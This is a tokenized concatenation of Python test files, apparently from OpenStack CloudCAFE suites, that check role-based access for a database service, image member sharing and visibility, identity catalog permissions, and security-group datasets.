db_name } ] <EOL> try : <EOL> self . dbaas_observer . databases . create ( self . creator_instance_id , <EOL> db_body ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_observer . databases . list ( <EOL> self . dbaas_observer . instances . get ( self . creator_instance_id ) ) <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_observer . databases . delete ( self . creator_instance_id , <EOL> db_name ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> def test_rbac_users_observer_rights ( self ) : <EOL> db_name = "<STR_LIT>" <EOL> db_body = [ { "<STR_LIT:name>" : db_name } ] <EOL> user_name = "<STR_LIT>" <EOL> user_body = [ { "<STR_LIT>" : db_body , "<STR_LIT:name>" : user_name , <EOL> "<STR_LIT:password>" : "<STR_LIT:password>" } ] <EOL> try : <EOL> self . dbaas_observer . users . create ( self . creator_instance_id , <EOL> user_body ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_observer . users . list ( <EOL> self . dbaas_observer . instances . get ( self . creator_instance_id ) ) <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_observer . users . delete ( self . creator_instance_id , db_name ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_observer . users . list_access ( self . creator_instance_id , <EOL> user_name ) <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_observer . users . revoke ( self . creator_instance_id , <EOL> user_name , <EOL> db_name ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> _db_list = [ db_name ] <EOL> self . dbaas_observer . users . grant ( self . creator_instance_id , <EOL> user_name , <EOL> _db_list ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> user_body [ <NUM_LIT:0> ] [ '<STR_LIT:password>' ] = "<STR_LIT>" <EOL> self . dbaas_observer . users . change_passwords ( <EOL> self . creator_instance_id , <EOL> user_body ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> def test_rbac_instance_observer_rights ( self ) : <EOL> next_flavor = <NUM_LIT:1> <EOL> resize_vol = <NUM_LIT:5> <EOL> try : <EOL> self . dbaas_observer . instances . list ( ) <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> self . dbaas_observer . instances . get ( self . creator_instance_id ) <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_observer . root . create ( self . creator_instance_id ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> self . dbaas_observer . root . is_root_enabled ( self . creator_instance_id ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . behavior . create_active_instance ( self . dbaas_observer ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_observer . instances . get ( <EOL> self . creator_instance_id ) . delete ( ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_observer . instances . resize_instance ( <EOL> self . creator_instance_id , <EOL> next_flavor ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_observer . instances . restart ( self . creator_instance_id ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_observer . instances . resize_volume ( <EOL> self . creator_instance_id , <EOL> resize_vol ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_observer . instances . get ( <EOL> self . creator_instance_id ) . delete ( ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> def test_rbac_flavors_observer_rights ( self ) : <EOL> expectedFlavorRamName = { <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" } <EOL> try : <EOL> flavorList = self . dbaas_observer . flavors . list ( ) <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> actualFlavorRamName = { } <EOL> self . assertIsNotNone ( flavorList , "<STR_LIT>" ) <EOL> for flavor in flavorList : <EOL> self . assertIsNotNone ( flavor . id , "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . links , <EOL> "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . name , "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . ram , "<STR_LIT>" ) <EOL> actualFlavorRamName [ flavor . ram ] = str ( flavor . name ) <EOL> self . assertEqual ( expectedFlavorRamName , <EOL> actualFlavorRamName , <EOL> "<STR_LIT>" <EOL> % ( expectedFlavorRamName , actualFlavorRamName ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) </s>
<s> """<STR_LIT>""" <EOL> import calendar <EOL> import time <EOL> from cloudcafe . common . tools . datagen import rand_name <EOL> from cloudcafe . glance . common . constants import Messages <EOL> from cloudcafe . glance . common . types import ImageMemberStatus <EOL> from cloudroast . glance . fixtures import ImagesFixture <EOL> class ListImageMembers ( ImagesFixture ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( ListImageMembers , cls ) . setUpClass ( ) <EOL> cls . alt_member_id = cls . images_alt_one . auth . tenant_id <EOL> cls . alt_two_member_id = cls . images_alt_two . auth . tenant_id <EOL> created_images = cls . images . behaviors . create_images_via_task ( <EOL> image_properties = { '<STR_LIT:name>' : rand_name ( '<STR_LIT>' ) } , <EOL> count = <NUM_LIT:6> ) <EOL> cls . shared_image = created_images . pop ( ) <EOL> cls . images . client . create_image_member ( <EOL> cls . shared_image . id_ , cls . alt_member_id ) <EOL> cls . images . client . create_image_member ( <EOL> cls . shared_image . id_ , cls . alt_two_member_id ) <EOL> cls . image_member_created_at_time_in_sec = ( <EOL> calendar . timegm ( time . gmtime ( ) ) ) <EOL> cls . alt_shared_image = created_images . pop ( ) <EOL> cls . images . client . create_image_member ( <EOL> cls . alt_shared_image . id_ , cls . alt_member_id ) <EOL> cls . images . client . create_image_member ( <EOL> cls . alt_shared_image . id_ , cls . alt_two_member_id ) <EOL> cls . no_access_image = created_images . pop ( ) <EOL> cls . delete_image = created_images . pop ( ) <EOL> cls . images . client . delete_image ( cls . delete_image . id_ ) <EOL> cls . deactivated_image = created_images . pop ( ) <EOL> cls . images . client . create_image_member ( <EOL> cls . deactivated_image . id_ , cls . alt_member_id ) <EOL> cls . images_admin . client . deactivate_image ( cls . deactivated_image . id_ ) <EOL> cls . reactivated_image = created_images . pop ( ) <EOL> cls . images . client . create_image_member ( <EOL> cls . reactivated_image . id_ , cls . alt_member_id ) <EOL> cls . images_admin . client . deactivate_image ( cls . reactivated_image . id_ ) <EOL> cls . images_admin . client . reactivate_image ( cls . reactivated_image . id_ ) <EOL> @ classmethod <EOL> def tearDownClass ( cls ) : <EOL> cls . images . behaviors . resources . release ( ) <EOL> super ( ListImageMembers , cls ) . tearDownClass ( ) <EOL> def test_list_image_members_all_member_statuses ( self ) : <EOL> """<STR_LIT>""" <EOL> status = { '<STR_LIT>' : ImageMemberStatus . ALL } <EOL> resp = self . images . client . list_image_members ( <EOL> image_id = self . shared_image . id_ , params = status ) <EOL> self . assertEqual ( <EOL> resp . status_code , <NUM_LIT:200> , <EOL> Messages . STATUS_CODE_MSG . format ( <NUM_LIT:200> , resp . status_code ) ) <EOL> listed_image_members = resp . entity <EOL> self . assertEqual ( <EOL> len ( listed_image_members ) , <NUM_LIT:2> , <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( len ( listed_image_members ) ) ) <EOL> def test_list_image_members_using_deactivated_image ( self ) : <EOL> """<STR_LIT>""" <EOL> image_member_ids = [ ] <EOL> errors = [ ] <EOL> resp = self . images . client . list_image_members ( <EOL> self . deactivated_image . id_ ) <EOL> self . assertEqual ( <EOL> resp . status_code , <NUM_LIT:200> , <EOL> Messages . STATUS_CODE_MSG . format ( <NUM_LIT:200> , resp . status_code ) ) <EOL> listed_image_members = resp . entity <EOL> self . assertEqual ( <EOL> len ( listed_image_members ) , <NUM_LIT:1> , <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( len ( listed_image_members ) ) ) <EOL> [ image_member_ids . append ( image_member . member_id ) <EOL> for image_member in listed_image_members ] <EOL> self . assertIn ( <EOL> self . alt_member_id , image_member_ids , <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( self . alt_member_id , image_member_ids ) ) <EOL> for image_member in listed_image_members : <EOL> errors = self . images . behaviors . validate_image_member ( image_member ) <EOL> self . assertEqual ( <EOL> errors , [ ] , <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( self . deactivated_image . id_ , <EOL> errors ) ) <EOL> def test_list_image_members_using_reactivated_image ( self ) : <EOL> """<STR_LIT>""" <EOL> image_member_ids = [ ] <EOL> errors = [ ] <EOL> resp = self . images . client . list_image_members ( <EOL> self . reactivated_image . id_ ) <EOL> self . assertEqual ( <EOL> resp . status_code , <NUM_LIT:200> , <EOL> Messages . STATUS_CODE_MSG . format ( <NUM_LIT:200> , resp . status_code ) ) <EOL> listed_image_members = resp . entity <EOL> self . assertEqual ( <EOL> len ( listed_image_members ) , <NUM_LIT:1> , <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( len ( listed_image_members ) ) ) <EOL> [ image_member_ids . append ( image_member . member_id ) <EOL> for image_member in listed_image_members ] <EOL> self . assertIn ( <EOL> self . alt_member_id , image_member_ids , <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( self . alt_member_id , image_member_ids ) ) <EOL> for image_member in listed_image_members : <EOL> errors = self . images . behaviors . validate_image_member ( image_member ) <EOL> self . assertEqual ( <EOL> errors , [ ] , <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( self . reactivated_image . id_ , <EOL> errors ) ) <EOL> def test_list_image_members_using_invalid_image_id ( self ) : <EOL> """<STR_LIT>""" <EOL> resp = self . images . client . list_image_members ( image_id = '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> resp . status_code , <NUM_LIT> , <EOL> Messages . STATUS_CODE_MSG . format ( <NUM_LIT> , resp . status_code ) ) <EOL> def test_list_image_members_using_blank_image_id ( self ) : <EOL> """<STR_LIT>""" <EOL> resp = self . images . client . list_image_members ( image_id = '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> resp . status_code , <NUM_LIT> , <EOL> Messages . STATUS_CODE_MSG . format ( <NUM_LIT> , resp . status_code ) ) <EOL> def test_list_image_members_using_deleted_image ( self ) : <EOL> """<STR_LIT>""" <EOL> resp = self . images . client . list_image_members ( self . delete_image . id_ ) <EOL> self . assertEqual ( <EOL> resp . status_code , <NUM_LIT> , <EOL> Messages . STATUS_CODE_MSG . format ( <NUM_LIT> , resp . status_code ) ) <EOL> def test_list_image_members_as_tenant_without_access_to_image ( self ) : <EOL> """<STR_LIT>""" <EOL> resp = self . images_alt_two . client . list_image_members ( <EOL> self . no_access_image . id_ ) <EOL> self . assertEqual ( <EOL> resp . status_code , <NUM_LIT> , <EOL> Messages . STATUS_CODE_MSG . format ( <NUM_LIT> , resp . status_code ) ) <EOL> self . assertIsNone ( resp . entity , msg = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( resp . entity ) ) <EOL> def _validate_image_member ( self , image_member ) : <EOL> """<STR_LIT>""" <EOL> errors = [ ] <EOL> created_at_delta = self . images . behaviors . get_time_delta ( <EOL> self . image_member_created_at_time_in_sec , image_member . created_at ) <EOL> updated_at_delta = self . images . behaviors . get_time_delta ( <EOL> self . image_member_created_at_time_in_sec , image_member . updated_at ) <EOL> if created_at_delta > self . images . config . max_created_at_delta : <EOL> errors . append ( Messages . PROPERTY_MSG . format ( <EOL> '<STR_LIT>' , self . images . config . max_created_at_delta , <EOL> created_at_delta ) ) <EOL> if image_member . image_id != self . shared_image . id_ : <EOL> errors . append ( Messages . PROPERTY_MSG . format ( <EOL> '<STR_LIT>' , self . shared_image . id_ , <EOL> image_member . image_id ) ) <EOL> if ( image_member . member_id != self . alt_member_id and <EOL> image_member . member_id != self . alt_two_member_id ) : <EOL> errors . append ( Messages . PROPERTY_MSG . format ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( self . alt_member_id , <EOL> self . alt_two_member_id ) , <EOL> image_member . member_id ) ) <EOL> if image_member . status != ImageMemberStatus . PENDING : <EOL> errors . append ( Messages . PROPERTY_MSG . format ( <EOL> '<STR_LIT:status>' , ImageMemberStatus . PENDING , image_member . status ) ) <EOL> if updated_at_delta > self . images . config . max_updated_at_delta : <EOL> errors . append ( Messages . PROPERTY_MSG . format ( <EOL> '<STR_LIT>' , self . images . config . max_updated_at_delta , <EOL> updated_at_delta ) ) <EOL> return errors </s>
<s> from cafe . drivers . unittest . datasets import DatasetList <EOL> from cafe . drivers . unittest . decorators import tags , DataDrivenClass <EOL> from cloudcafe . identity . config import ( <EOL> ServiceAdmin , IdentityAdmin , UserAdmin , UserManage , DefaultUser ) <EOL> from cloudroast . identity . v3 . fixture import IdentityV3Fixture <EOL> class UserDataset ( DatasetList ) : <EOL> def __init__ ( self ) : <EOL> test_cases = [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT:data>" : { <EOL> "<STR_LIT>" : <NUM_LIT:200> , <EOL> "<STR_LIT>" : ServiceAdmin } } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT:data>" : { <EOL> "<STR_LIT>" : <NUM_LIT:200> , <EOL> "<STR_LIT>" : IdentityAdmin } } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT:data>" : { <EOL> "<STR_LIT>" : <NUM_LIT:200> , <EOL> "<STR_LIT>" : UserAdmin } } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT:data>" : { <EOL> "<STR_LIT>" : <NUM_LIT:200> , <EOL> "<STR_LIT>" : UserManage } } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT:data>" : { <EOL> "<STR_LIT>" : <NUM_LIT:200> , <EOL> "<STR_LIT>" : DefaultUser } } ] <EOL> for test_case in test_cases : <EOL> self . append_new_dataset ( test_case [ "<STR_LIT:name>" ] , test_case [ "<STR_LIT:data>" ] ) <EOL> @ DataDrivenClass ( UserDataset ( ) ) <EOL> class TestCatalog ( IdentityV3Fixture ) : <EOL> """<STR_LIT>""" <EOL> get_service_catalog_resp = None <EOL> user_config = None <EOL> catalog_is_empty = False <EOL> @ tags ( '<STR_LIT>' , type = '<STR_LIT>' ) <EOL> def test_get_service_catalog ( self ) : <EOL> """<STR_LIT>""" <EOL> resp = self . v3_composite . apis . catalog . client . get_catalog ( ) <EOL> self . assertEqual ( resp . status_code , self . get_service_catalog_resp ) <EOL> self . assertEqual ( "<STR_LIT>" . format ( <EOL> self . v3_composite . ident_config . global_authentication_endpoint ) , <EOL> resp . entity . links . self_ ) <EOL> self . _verify_catalog_response ( catalog_response = resp , <EOL> catalog_is_empty = self . catalog_is_empty ) <EOL> @ tags ( '<STR_LIT>' , type = '<STR_LIT>' ) <EOL> def test_list_users ( self ) : <EOL> """<STR_LIT>""" <EOL> resp = self . v3_composite . apis . users . client . list_users ( ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) </s>
<s> """<STR_LIT>""" <EOL> from cafe . drivers . unittest . decorators import tags <EOL> from cloudcafe . images . common . types import ImageMemberStatus <EOL> from cloudroast . images . fixtures import ImagesFixture <EOL> class TestGetImageMemberPositive ( ImagesFixture ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( TestGetImageMemberPositive , cls ) . setUpClass ( ) <EOL> cls . images = cls . images_behavior . create_images_via_task ( count = <NUM_LIT:2> ) <EOL> @ tags ( type = '<STR_LIT>' , regression = '<STR_LIT:true>' ) <EOL> def test_get_image_member_as_member_image_shared_with ( self ) : <EOL> """<STR_LIT>""" <EOL> member_id = self . alt_tenant_id <EOL> image = self . images . pop ( ) <EOL> response = self . images_client . add_member ( image . id_ , member_id ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> member = response . entity <EOL> response = self . alt_images_client . get_member ( <EOL> image . id_ , member . member_id ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> get_member = response . entity <EOL> self . images_behavior . validate_image_member ( <EOL> image . id_ , get_member , member . member_id ) <EOL> @ tags ( type = '<STR_LIT>' , regression = '<STR_LIT:true>' ) <EOL> def test_get_image_member_membership_states ( self ) : <EOL> """<STR_LIT>""" <EOL> member_id = self . alt_tenant_id <EOL> image = self . images . pop ( ) <EOL> membership_states = [ <EOL> ImageMemberStatus . PENDING , ImageMemberStatus . ACCEPTED , <EOL> ImageMemberStatus . REJECTED ] <EOL> response = self . images_client . add_member ( image . id_ , member_id ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> member = response . entity <EOL> for state in membership_states : <EOL> if state != ImageMemberStatus . PENDING : <EOL> response = self . alt_images_client . update_member ( <EOL> image . id_ , member_id , state ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> response = self . images_client . get_member ( <EOL> image . id_ , member . member_id ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> get_member = response . entity <EOL> self . assertEqual ( get_member . status , state ) <EOL> self . images_behavior . validate_image_member ( <EOL> image . id_ , get_member , member . member_id ) </s>
<s> """<STR_LIT>""" <EOL> from cafe . drivers . unittest . decorators import tags <EOL> from cloudcafe . compute . common . exceptions import ( <EOL> BadRequest , Forbidden , ItemNotFound ) <EOL> from cloudcafe . images . common . types import ImageMemberStatus , ImageVisibility <EOL> from cloudroast . images . fixtures import ImagesFixture <EOL> class ImageVisibilityLifeCycleTest ( ImagesFixture ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( ImageVisibilityLifeCycleTest , cls ) . setUpClass ( ) <EOL> cls . image = cls . images_behavior . create_image_via_task ( ) <EOL> @ tags ( type = '<STR_LIT>' , regression = '<STR_LIT:true>' ) <EOL> def test_image_visibility_life_cycle ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . image . visibility , ImageVisibility . PRIVATE ) <EOL> response = self . images_client . get_image ( image_id = self . image . id_ ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> get_image = response . entity <EOL> self . assertEqual ( get_image , self . image ) <EOL> with self . assertRaises ( ItemNotFound ) : <EOL> self . alt_images_client . get_image ( image_id = self . image . id_ ) <EOL> images = self . alt_images_behavior . list_images_pagination ( ) <EOL> self . assertNotIn ( self . image , images ) <EOL> response = self . images_client . add_member ( <EOL> image_id = self . image . id_ , member_id = self . alt_tenant_id ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> member = response . entity <EOL> self . assertEqual ( member . member_id , self . alt_tenant_id ) <EOL> self . assertEqual ( member . status , ImageMemberStatus . PENDING ) <EOL> response = self . alt_images_client . get_image ( image_id = self . image . id_ ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> images = self . alt_images_behavior . list_images_pagination ( ) <EOL> self . assertNotIn ( self . image , images ) <EOL> with self . assertRaises ( Forbidden ) : <EOL> self . images_client . update_image ( <EOL> image_id = self . image . id_ , <EOL> remove = { "<STR_LIT>" : ImageVisibility . PUBLIC } ) <EOL> with self . assertRaises ( Forbidden ) : <EOL> self . alt_images_client . update_image ( <EOL> image_id = self . image . id_ , <EOL> replace = { "<STR_LIT>" : ImageVisibility . PUBLIC } ) <EOL> with self . assertRaises ( BadRequest ) : <EOL> self . images_client . update_image ( <EOL> image_id = self . image . id_ , <EOL> replace = { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> response = self . alt_images_client . update_member ( <EOL> image_id = self . image . id_ , member_id = self . alt_tenant_id , <EOL> status = ImageMemberStatus . ACCEPTED ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> member = response . entity <EOL> self . assertEqual ( member . member_id , self . alt_tenant_id ) <EOL> self . assertEqual ( member . status , ImageMemberStatus . ACCEPTED ) <EOL> response = self . alt_images_client . get_image ( image_id = self . image . id_ ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> get_image = response . entity <EOL> self . assertEqual ( get_image , self . image ) <EOL> images = self . alt_images_behavior . list_images_pagination ( ) <EOL> self . assertIn ( self . image , images ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from cafe . drivers . unittest . datasets import DatasetList <EOL> from cafe . drivers . unittest . decorators import DataDrivenFixture , data_driven_test , tags <EOL> from cloudcafe . networking . networks . config import NetworkingSecondUserConfig <EOL> from cloudroast . networking . networks . fixtures import NetworkingSecurityGroupsFixture <EOL> from cloudcafe . networking . networks . extensions . security_groups_api . constants import SecurityGroupsErrorTypes , SecurityGroupsResponseCodes <EOL> data_set_list = DatasetList ( ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:255> } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:2> } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { "<STR_LIT>" : '<STR_LIT>' , "<STR_LIT>" : '<STR_LIT>' } , 